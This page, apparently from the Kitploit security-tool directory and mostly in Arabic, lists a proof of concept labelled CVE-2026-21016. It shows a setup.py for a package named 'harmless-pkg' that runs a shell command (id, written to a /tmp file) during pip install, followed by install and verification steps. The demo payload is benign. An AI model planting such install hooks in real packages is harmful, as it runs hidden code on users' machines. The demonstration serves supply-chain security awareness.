Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-21016-Malicious-PyPI-Package-Install-Hook-setup.py-Execution- — يوضح كيف تنفّذ حزمة Python خبيثة أوامر اعتباطية أثناء عملية pip install عبر setup.py، مع تسليط الضوء على مخاطر سلسلة التوريد في PyPI والتصيّد الإملائي (typosquatting). | Kitploit
أدوات/GitHubGitHub/george0papasotiriou/cve-2026-21016-malicious-pypi-package-install-hook-setup.py-execution-
الاستغلالأمن سلسلة التوريدالتعلم والتعليمتطوير الحمولاتالهجوم العدائي
GitHubgeorge0papasotiriou/cve-2026-21016-malicious-pypi-package-install-hook-setup.py-execution-

CVE-2026-21016-Malicious-PyPI-Package-Install-Hook-setup.py-Execution-

يوضح كيف تنفّذ حزمة Python خبيثة أوامر اعتباطية أثناء عملية pip install عبر setup.py، مع تسليط الضوء على مخاطر سلسلة التوريد في PyPI والتصيّد الإملائي (typosquatting).

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 16 أياملم تتم المراجعة بعد

CVE-2026-21016 – خطاف تثبيت حزمة PyPI الخبيثة (تنفيذ setup.py)

كود البرنامج (Python)

root@kitploit:~
# setup.py - Malicious package that executes during install
from setuptools import setup
import os

# This runs on pip install
os.system('id > /tmp/pwned_by_package')

setup(
    name='harmless-pkg',
    version='1.0',
    packages=[],
)

CVE-2026-21016 – خطاف تثبيت حزمة PyPI الخبيثة (setup.py)

Severity: Critical

نظرة عامة

يمكن أن تتضمن حزمة PyPI تعليمات برمجية عشوائية في ملف setup.py الخاص بها، والذي يتم تنفيذه أثناء pip install. يمكن للمهاجم نشر حزمة باسم مشابه لحزمة شائعة (typosquatting) وعند التثبيت، يتم تنفيذ الحمولة بصلاحيات المستخدم، مما يؤدي إلى تنفيذ برمجيات عن بُعد.

تفاصيل الثغرة

  • النوع: هجوم سلسلة التوريد / تنفيذ برمجيات
  • التأثير: اختراق النظام، سرقة بيانات الاعتماد.
  • السبب الجذري: ينفذ pip ملف setup.py دون عزل (sandbox)، مما يمنح الحزم وصولاً كاملاً.

عرض الاستغلال

  1. أنشئ دليل الحزمة الخبيثة باستخدام ملف setup.py المعطى.
  2. ثبّتها محليًا:
    root@kitploit:~
    pip install ./harmless-pkg
    
    
  3. تحقق من المخرجات:
    root@kitploit:~
    cat /tmp/pwned_by_package
    

تم تنفيذ الأمر id.

تنزيل الأداة